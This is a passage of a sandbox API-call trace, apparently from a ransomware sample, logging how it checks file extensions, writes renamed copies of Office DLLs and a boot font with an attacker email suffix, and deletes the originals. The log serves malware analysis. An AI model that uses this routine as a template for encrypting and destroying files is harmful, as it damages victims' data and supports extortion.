lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEDAO.DLL") returned 66 [0059.927] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEDAO.DLL") returned 66 [0059.927] lstrlenW (lpString=".doc") returned 4 [0059.927] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0059.927] lstrlenW (lpString=".docx") returned 5 [0059.927] lstrcmpiW (lpString1=".docx", lpString2="O.DLL") returned -1 [0059.927] lstrlenW (lpString=".pdf") returned 4 [0059.927] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0059.927] lstrlenW (lpString=".xls") returned 4 [0059.927] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0059.927] lstrlenW (lpString=".xlsx") returned 5 [0059.927] lstrcmpiW (lpString1=".xlsx", lpString2="O.DLL") returned -1 [0059.927] lstrlenW (lpString=".ppt") returned 4 [0059.928] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0059.928] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEDAO.DLL") returned 66 [0059.928] lstrlenW (lpString=".zip") returned 4 [0059.928] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0059.928] lstrlenW (lpString=".rar") returned 4 [0059.928] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0059.928] lstrlenW (lpString=".bz2") returned 4 [0059.928] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0059.928] lstrlenW (lpString=".7z") returned 3 [0059.928] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0059.928] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEDAO.DLL") returned 66 [0059.928] lstrlenW (lpString=".dbf") returned 4 [0059.928] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0059.928] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEDAO.DLL") returned 66 [0059.928] lstrlenW (lpString=".1cd") returned 4 [0059.928] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0059.928] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEDAO.DLL") returned 66 [0059.928] lstrlenW (lpString=".jpg") returned 4 [0059.928] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0059.928] lstrcmpiW (lpString1=".DLL", lpString2=".USA") returned -1 [0059.928] lstrlenW (lpString="ACEODBC.DLL") returned 11 [0059.928] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODBC.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceodbc.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0059.929] GetFileSizeEx (in: hFile=0x210, lpFileSize=0x32bff1c | out: lpFileSize=0x32bff1c*=342960) returned 1 [0059.929] CloseHandle (hObject=0x210) returned 1 [0059.929] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODBC.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceodbc.dll")) returned 0x20 [0059.929] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODBC.DLL.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceodbc.dll.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0059.929] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODBC.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceodbc.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0059.929] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0059.929] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0059.929] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODBC.DLL.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceodbc.dll.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0059.930] GetLastError () returned 0x0 [0059.930] ReadFile (in: hFile=0x210, lpBuffer=0x3bc0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bc0020*, lpNumberOfBytesRead=0x32bfed4*=0x53bb0, lpOverlapped=0x0) returned 1 [0059.937] WriteFile (in: hFile=0x1c4, lpBuffer=0x3bc0020*, nNumberOfBytesToWrite=0x53bc0, lpNumberOfBytesWritten=0x32bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bc0020*, lpNumberOfBytesWritten=0x32bfc9c*=0x53bc0, lpOverlapped=0x0) returned 1 [0059.944] ReadFile (in: hFile=0x210, lpBuffer=0x3bc0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bc0020*, lpNumberOfBytesRead=0x32bfed4*=0x0, lpOverlapped=0x0) returned 1 [0059.944] WriteFile (in: hFile=0x1c4, lpBuffer=0x3bc0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x32bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bc0020*, lpNumberOfBytesWritten=0x32bfc9c*=0xea, lpOverlapped=0x0) returned 1 [0059.944] SetEndOfFile (hFile=0x1c4) returned 1 [0059.944] CloseHandle (hObject=0x1c4) returned 1 [0059.945] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0059.945] SetEndOfFile (hFile=0x210) returned 1 [0059.948] CloseHandle (hObject=0x210) returned 1 [0059.948] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODBC.DLL.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0059.948] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODBC.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceodbc.dll")) returned 1 [0059.948] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODBC.DLL") returned 67 [0059.948] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODBC.DLL") returned 67 [0059.948] lstrlenW (lpString=".doc") returned 4 [0059.948] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0059.948] lstrlenW (lpString=".docx") returned 5 [0059.948] lstrcmpiW (lpString1=".docx", lpString2="C.DLL") returned -1 [0059.948] lstrlenW (lpString=".pdf") returned 4 [0059.948] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0059.948] lstrlenW (lpString=".xls") returned 4 [0059.948] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0059.949] lstrlenW (lpString=".xlsx") returned 5 [0059.949] lstrcmpiW (lpString1=".xlsx", lpString2="C.DLL") returned -1 [0059.949] lstrlenW (lpString=".ppt") returned 4 [0059.949] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0059.949] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODBC.DLL") returned 67 [0059.949] lstrlenW (lpString=".zip") returned 4 [0059.949] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0059.949] lstrlenW (lpString=".rar") returned 4 [0059.949] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0059.949] lstrlenW (lpString=".bz2") returned 4 [0059.949] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0059.949] lstrlenW (lpString=".7z") returned 3 [0059.949] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0059.949] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODBC.DLL") returned 67 [0059.949] lstrlenW (lpString=".dbf") returned 4 [0059.949] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0059.949] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODBC.DLL") returned 67 [0059.949] lstrlenW (lpString=".1cd") returned 4 [0059.949] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0059.949] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODBC.DLL") returned 67 [0059.949] lstrlenW (lpString=".jpg") returned 4 [0059.949] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0059.949] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODBC.DLL") returned 67 [0059.949] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODBC.DLL") returned 67 [0059.949] lstrlenW (lpString=".doc") returned 4 [0059.949] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0059.949] lstrlenW (lpString=".docx") returned 5 [0059.949] lstrcmpiW (lpString1=".docx", lpString2="C.DLL") returned -1 [0059.949] lstrlenW (lpString=".pdf") returned 4 [0059.949] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0059.949] lstrlenW (lpString=".xls") returned 4 [0059.949] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0059.950] lstrlenW (lpString=".xlsx") returned 5 [0059.950] lstrcmpiW (lpString1=".xlsx", lpString2="C.DLL") returned -1 [0059.950] lstrlenW (lpString=".ppt") returned 4 [0059.950] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0059.950] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODBC.DLL") returned 67 [0059.950] lstrlenW (lpString=".zip") returned 4 [0059.950] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0059.950] lstrlenW (lpString=".rar") returned 4 [0060.145] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0060.149] lstrlenW (lpString=".bz2") returned 4 [0060.149] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0060.149] lstrlenW (lpString=".7z") returned 3 [0060.151] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0060.151] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODBC.DLL") returned 67 [0060.151] lstrlenW (lpString=".dbf") returned 4 [0060.158] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0060.158] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODBC.DLL") returned 67 [0060.158] lstrlenW (lpString=".1cd") returned 4 [0060.163] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0060.163] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODBC.DLL") returned 67 [0060.163] lstrlenW (lpString=".jpg") returned 4 [0060.164] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0060.164] lstrcmpiW (lpString1=".DLL", lpString2=".USA") returned -1 [0060.164] lstrlenW (lpString="ACERCLR.DLL") returned 11 [0060.164] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACERCLR.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acerclr.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0060.755] GetFileSizeEx (in: hFile=0x214, lpFileSize=0x32bff1c | out: lpFileSize=0x32bff1c*=55744) returned 1 [0060.755] CloseHandle (hObject=0x214) returned 1 [0060.755] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACERCLR.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acerclr.dll")) returned 0x20 [0060.755] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACERCLR.DLL.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acerclr.dll.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0060.755] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACERCLR.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acerclr.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0060.755] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0060.756] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0060.756] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACERCLR.DLL.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acerclr.dll.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0060.756] GetLastError () returned 0x0 [0060.756] ReadFile (in: hFile=0x214, lpBuffer=0x3bc0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bc0020*, lpNumberOfBytesRead=0x32bfed4*=0xd9c0, lpOverlapped=0x0) returned 1 [0060.759] WriteFile (in: hFile=0x1a0, lpBuffer=0x3bc0020*, nNumberOfBytesToWrite=0xd9d0, lpNumberOfBytesWritten=0x32bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bc0020*, lpNumberOfBytesWritten=0x32bfc9c*=0xd9d0, lpOverlapped=0x0) returned 1 [0060.761] ReadFile (in: hFile=0x214, lpBuffer=0x3bc0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bc0020*, lpNumberOfBytesRead=0x32bfed4*=0x0, lpOverlapped=0x0) returned 1 [0060.761] WriteFile (in: hFile=0x1a0, lpBuffer=0x3bc0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x32bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bc0020*, lpNumberOfBytesWritten=0x32bfc9c*=0xea, lpOverlapped=0x0) returned 1 [0060.761] SetEndOfFile (hFile=0x1a0) returned 1 [0060.761] CloseHandle (hObject=0x1a0) returned 1 [0060.761] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0060.761] SetEndOfFile (hFile=0x214) returned 1 [0060.762] CloseHandle (hObject=0x214) returned 1 [0060.762] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACERCLR.DLL.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0060.762] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACERCLR.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acerclr.dll")) returned 1 [0060.763] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACERCLR.DLL") returned 67 [0060.763] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACERCLR.DLL") returned 67 [0060.763] lstrlenW (lpString=".doc") returned 4 [0060.763] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0060.763] lstrlenW (lpString=".docx") returned 5 [0060.763] lstrcmpiW (lpString1=".docx", lpString2="R.DLL") returned -1 [0060.763] lstrlenW (lpString=".pdf") returned 4 [0060.763] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0060.763] lstrlenW (lpString=".xls") returned 4 [0060.763] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0060.763] lstrlenW (lpString=".xlsx") returned 5 [0060.763] lstrcmpiW (lpString1=".xlsx", lpString2="R.DLL") returned -1 [0060.763] lstrlenW (lpString=".ppt") returned 4 [0060.763] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0060.763] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACERCLR.DLL") returned 67 [0060.763] lstrlenW (lpString=".zip") returned 4 [0060.763] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0060.763] lstrlenW (lpString=".rar") returned 4 [0060.763] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0060.763] lstrlenW (lpString=".bz2") returned 4 [0060.763] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0060.763] lstrlenW (lpString=".7z") returned 3 [0060.763] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0060.763] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACERCLR.DLL") returned 67 [0060.763] lstrlenW (lpString=".dbf") returned 4 [0060.763] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0060.763] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACERCLR.DLL") returned 67 [0060.763] lstrlenW (lpString=".1cd") returned 4 [0060.763] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0060.763] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACERCLR.DLL") returned 67 [0060.764] lstrlenW (lpString=".jpg") returned 4 [0060.764] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0060.764] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACERCLR.DLL") returned 67 [0060.764] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACERCLR.DLL") returned 67 [0060.764] lstrlenW (lpString=".doc") returned 4 [0060.764] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0060.764] lstrlenW (lpString=".docx") returned 5 [0060.764] lstrcmpiW (lpString1=".docx", lpString2="R.DLL") returned -1 [0060.764] lstrlenW (lpString=".pdf") returned 4 [0060.764] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0060.764] lstrlenW (lpString=".xls") returned 4 [0060.764] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0060.764] lstrlenW (lpString=".xlsx") returned 5 [0060.764] lstrcmpiW (lpString1=".xlsx", lpString2="R.DLL") returned -1 [0060.764] lstrlenW (lpString=".ppt") returned 4 [0060.764] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0060.764] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACERCLR.DLL") returned 67 [0060.764] lstrlenW (lpString=".zip") returned 4 [0060.764] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0060.764] lstrlenW (lpString=".rar") returned 4 [0060.764] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0060.764] lstrlenW (lpString=".bz2") returned 4 [0060.764] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0060.764] lstrlenW (lpString=".7z") returned 3 [0060.764] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0060.764] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACERCLR.DLL") returned 67 [0060.764] lstrlenW (lpString=".dbf") returned 4 [0060.764] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0060.764] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACERCLR.DLL") returned 67 [0060.764] lstrlenW (lpString=".1cd") returned 4 [0060.764] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0060.764] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACERCLR.DLL") returned 67 [0060.765] lstrlenW (lpString=".jpg") returned 4 [0060.765] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0060.765] lstrcmpiW (lpString1=".DLL", lpString2=".USA") returned -1 [0060.765] lstrlenW (lpString="ACEREP.DLL") returned 10 [0060.765] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEREP.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acerep.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0060.765] GetFileSizeEx (in: hFile=0x214, lpFileSize=0x32bff1c | out: lpFileSize=0x32bff1c*=691616) returned 1 [0060.765] CloseHandle (hObject=0x214) returned 1 [0060.765] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEREP.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acerep.dll")) returned 0x20 [0060.765] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEREP.DLL.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acerep.dll.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0060.765] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEREP.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acerep.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0060.766] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0060.766] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0060.766] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEREP.DLL.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acerep.dll.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0060.766] GetLastError () returned 0x0 [0060.766] ReadFile (in: hFile=0x214, lpBuffer=0x3bc0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bc0020*, lpNumberOfBytesRead=0x32bfed4*=0xa8da0, lpOverlapped=0x0) returned 1 [0060.780] WriteFile (in: hFile=0x1a0, lpBuffer=0x3bc0020*, nNumberOfBytesToWrite=0xa8db0, lpNumberOfBytesWritten=0x32bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bc0020*, lpNumberOfBytesWritten=0x32bfc9c*=0xa8db0, lpOverlapped=0x0) returned 1 [0060.791] ReadFile (in: hFile=0x214, lpBuffer=0x3bc0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bc0020*, lpNumberOfBytesRead=0x32bfed4*=0x0, lpOverlapped=0x0) returned 1 [0060.791] WriteFile (in: hFile=0x1a0, lpBuffer=0x3bc0020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x32bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bc0020*, lpNumberOfBytesWritten=0x32bfc9c*=0xe8, lpOverlapped=0x0) returned 1 [0060.791] SetEndOfFile (hFile=0x1a0) returned 1 [0060.791] CloseHandle (hObject=0x1a0) returned 1 [0060.791] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0060.791] SetEndOfFile (hFile=0x214) Thread: id = 17 os_tid = 0x9c0 [0034.621] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10000) returned 0x38102b0 [0034.621] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10000) returned 0x38202b8 [0034.621] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x6702c8 [0034.621] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x6) returned 0x624118 [0034.621] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x6702e0 [0034.621] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x100000) returned 0x3cd0020 [0034.622] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x6702f8 [0034.622] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x6702f8, Size=0x20) returned 0x626848 [0034.622] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x6702f8 [0034.622] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x6702f8, Size=0x20) returned 0x626870 [0034.622] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76c20000 [0034.622] GetProcAddress (hModule=0x76c20000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x76c4d650 [0034.622] Wow64DisableWow64FsRedirection (in: OldValue=0x350ff58 | out: OldValue=0x350ff58*=0x0) returned 1 [0034.622] lstrlenW (lpString="kernel32.dll") returned 12 [0034.622] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x626848 | out: hHeap=0x5d0000) returned 1 [0034.622] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0034.622] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x626870 | out: hHeap=0x5d0000) returned 1 [0034.622] Sleep (dwMilliseconds=0x64) [0034.940] lstrcmpiW (lpString1=".ttf", lpString2=".USA") returned -1 [0034.940] lstrlenW (lpString="kor_boot.ttf") returned 12 [0034.940] CreateFileW (lpFileName="C:\\Boot\\Fonts\\kor_boot.ttf" (normalized: "c:\\boot\\fonts\\kor_boot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8 [0035.222] GetFileSizeEx (in: hFile=0x1b8, lpFileSize=0x350ff1c | out: lpFileSize=0x350ff1c*=2371360) returned 1 [0035.222] CloseHandle (hObject=0x1b8) returned 1 [0035.222] GetFileAttributesW (lpFileName="C:\\Boot\\Fonts\\kor_boot.ttf" (normalized: "c:\\boot\\fonts\\kor_boot.ttf")) returned 0x20 [0035.223] GetFileAttributesW (lpFileName="C:\\Boot\\Fonts\\kor_boot.ttf.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\boot\\fonts\\kor_boot.ttf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0035.223] MoveFileW (lpExistingFileName="C:\\Boot\\Fonts\\kor_boot.ttf" (normalized: "c:\\boot\\fonts\\kor_boot.ttf"), lpNewFileName="C:\\Boot\\Fonts\\kor_boot.ttf.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\boot\\fonts\\kor_boot.ttf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0 [0035.223] lstrlenW (lpString="C:\\Boot\\Fonts\\kor_boot.ttf") returned 26 [0035.223] lstrlenW (lpString="C:\\Boot\\Fonts\\kor_boot.ttf") returned 26 [0035.223] lstrlenW (lpString=".doc") returned 4 [0035.223] lstrcmpiW (lpString1=".doc", lpString2=".ttf") returned -1 [0035.223] lstrlenW (lpString=".docx") returned 5 